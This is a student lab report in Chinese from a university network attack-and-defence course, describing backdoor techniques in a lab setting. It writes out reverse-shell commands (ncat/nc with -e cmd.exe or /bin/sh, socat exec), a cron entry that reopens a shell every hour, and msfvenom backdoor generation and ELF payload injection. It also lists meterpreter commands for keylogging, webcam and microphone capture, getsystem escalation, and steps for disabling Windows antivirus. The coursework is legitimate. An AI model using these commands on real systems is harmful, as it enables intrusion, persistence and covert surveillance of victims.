当前位置: 首页 > news >正文

20232319 2025-2026-1 《网络与系统攻防技术》实验二实验报告

一、实验内容

1.实践目标

(1)使用netcat获取主机操作Shell,cron启动某项任务(任务自定)

PS:cron是linux下用来周期性的执行某种任务或等待处理某些事件的一个守护进程

(2)使用socat获取主机操作Shell, 任务计划启动

(3)使用MSF meterpreter(或其他软件)生成可执行文件(后门),利用ncat或socat传送到主机并运行获取主机Shell

(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容的后门,并尝试提权

(5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

2.实验要求

掌握后门原理及免杀技术
回答问题

(1)例举你能想到的一个后门进入到你系统中的可能方式?

答:下载未知安全性与来源的软件,可能会顺带下载后门程序

(2)例举你知道的后门如何启动起来(win及linux)的方式?

答:windows:将后门程序路径添加到注册表启动项,使系统启动时自动运行后门程序
linux:通过crontab设置定时任务,使后门在系统启动或特定时间自动执行

(3)Meterpreter有哪些给你映像深刻的功能?

答:能够获取被攻击者的照片,快速截屏,获取键盘输入信息。

(4)如何发现自己有系统有没有被安装后门?
答:使用杀毒软件与防火墙。

二、实验过程

1.使用netcat获取主机操作Shell,cron启动某项任务

主机和虚拟机互ping,测试连通性
检测_主机虚拟机互ping

使用netcat获取主机shell,kali获取主机操作shell
windows主机:ncat.exe-ecmd.exe 192.168.190.134 5218
kali虚拟机:ncat -l-p 5218
kali获得主机shell

windows获取主机操作shell
windows主机:ncat.exe -l -p 5218
kali虚拟机:nc 192.168.152.135 5218 -e /bin/sh
windows获取kali的shell

在kali虚拟机上使用cron
在文件末加上39 * * * * /bin/netcat 192.168.152.135 5218 -e /bin/sh
表示每个小时的39分反向连接windows的5218端口
crontab编辑

运行结果,(右下角)16时39分开始运行,获取shell
到点运行

2.使用socat获取主机操作Shell, 任务计划启动

打开任务计划程序
打开任务计划程序

使用socat,设定参数tcp-listen:5218 exec:cmd.exe,pty,stderr
使用socat

新建触发器
新建触发器

到点开始运行,获取主机shell
手动点击运行

成功运行获取主机shell

3.使用MSF meterpreter(或其他软件)生成可执行文件(后门),利用ncat或socat传送到主机并运行获取主机Shell

在kali上生成后门程序
msfvenom -p windows/meterpreter/reverse_tcp LH0ST=192.168.190.134 LP0RT=5218 -f exe > 20232319_backdbor.exe
控制端(kali)使用msf生成后门程序(20232319)

启动msfconsole,调用监听模块

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.190.134
set LPORT 5218

调用监听模块

通过netcat监听传输后门程序
通过netcat监听传输后门程序

成功启动后门程序,kali获取windows的shell
启动监听,同时在windows端运行后门程序,成功

4.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容的后门,并尝试提权

获取摄像头
成功后截屏

获取主机名,使用getsystem提权
成功后getuid

获取键盘输入内容
成功后读取键盘输入

总结常用渗透命令

record_mic #目标主机录制音频
screenshot #截屏
webcam_snap #调用摄像头拍照
keyscan_start #获取目标主机的键盘输入
keyscan_dump #导出目标主机键盘输入
keyscan_stop #停止

5.使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

另起终端(终端2)
结合shellcode与msfconsole生成后门文件2319backdoor_shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcpLH0ST=192.168.190.136 LP0RT=5218 -X pwn20232319 -f elf > 2319backdoor_shellcode
-x ./pwn20232319将payload注入到名为pwn20232319的文件中;-f elf 指定生成文件的格式为 ELF
另起终端,结合shellcode生成后门程序

赋予后门程序的可执行权限
赋予可执行权限

在终端1启动msfconsole,在终端2运行后门程序

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp #注意此处为linux,不是windows
set LHOST 192.168.190.134
set LPORT 5218

反弹连接成功,获取shell
反弹连接成功

三、问题及解决方案

  • 问题1:exploit监听失败
  • 问题1解决方案:更新Metasploit
sudo apt update
sudo apt install metasploit-framework
  • 问题2:使用netcat传输过去的程序无法运行,显示当前版本无法运,或者显示当前程序存在病毒,禁止运行
    3262837-20251018103730225-33697121

  • 问题2解决方案:在windows中使用命令控制符(cmd)接收后门程序,而不是windows powershell;windows安全防护1中心 -> 病毒和防护威胁 -> 管理设置,关闭防护。

4.学习感悟、思考等

本次实验共有5个任务,每个任务各有其获取shell的特点。尤其是使用msfconsole生成后门程序的任务,体现了后门的隐蔽性与攻击性。身为本次实验的攻击者,我学会了如何使用kali监听主机,生成后门程序并操控被攻击者的shell。
本次实验中令人感到厌烦的的防火墙与病毒防护程序,在生活中的作用是多么的重要,如果没有防火墙的阻拦与杀毒软件检验到无意中下载的后门程序,个人的数据安全,隐私安全就有可能遭受到威胁。

参考资料

0x11_MAL_逆向与Bof基础.md
0x13_MAL_使用netcat进行反弹链接的shellcode.md

http://www.hskmm.com/?act=detail&tid=34592

相关文章:

  • 刷题日记—洛谷循环题单
  • 为什么需要学习变异的算法?
  • 今天搞了新的回归,不显著
  • shell编程学习笔记005之until循环
  • shell编程学习笔记006之select循环
  • burpsuite抓取小程序公众号数据包-cnblog
  • 2026 NOI 做题记录(七)
  • esp8266模块开发准备工作
  • 关于本学期我的编码规范与数学之美第一章观后感 - C
  • 线程--线程生命周期、Synchronized
  • C#中Yolo开发环境
  • CF1918F Caterpillar on a Tree
  • tryhackme-预安全-网络如何工作-DNS 详细信息-09
  • Diffusion
  • SP4191 天空代码 分析
  • l2正则化项以及torch.norm
  • 又数据结构
  • 大物实验
  • 蒙特卡洛保形预测技术解析
  • [KaibaMath]1013 关于收敛数列保不等式性的证明
  • 20231408徐钰涵《密码系统设计》
  • 洛谷比赛做题记录
  • 什么是命运(摘抄)
  • 编程指北的 C++
  • Linux grep命令
  • 物品复活软件开发记录 - CelestialZ
  • 螺纹钢的中线节奏
  • 2022 ICPC Hangzhou
  • KL散度
  • Win11常用的bat脚本